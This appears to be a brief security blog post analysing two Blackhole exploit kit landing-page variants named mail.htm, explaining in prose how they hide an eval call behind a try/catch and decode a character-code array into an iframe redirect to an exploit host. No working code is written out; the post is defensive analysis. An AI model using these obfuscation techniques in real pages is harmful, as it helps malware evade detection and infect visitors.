Blackhole Exploit Please Wait Page

Blackhole Exploit Please Wait Page

 

Today, Polonus reported 2 Blackhole exploit sites here. Lets examine them. First, maolinsh:

Blackhole Exploit For mail.htm Variant 1

Blackhole Exploit For mail.htm Variant 1

So it tries to define n^ as eval, only to fail, thus the fallback to catch occurs. We see the general zxc for the catch statement that lots of Blackhole variants use. Define n as an array of numbers, then loop through it to add onto s with the fromCharCode() function. Then 2 if statements that will 99.9% return tells the browser to do the s string as javascript code (using eval).

Next up, destroya:

Blackhole Exploit For mail.htm Variant 2

Blackhole Exploit For mail.htm Variant 2

This one is the same as Variant 1, except a few differences. Variant 2 trys to define a variable as eval prototype. The second if featured in Variant 1 is also not present.

Both of these scripts deobfuscate to a iframer to a blackhole exploit hotspot. Both of these files are mail.htm. Searching on CleanMX reveals that there are others out there. Here is an example VirusTotal result. Only 2 detect.

Be prepared,
~!Donovan

Advertisements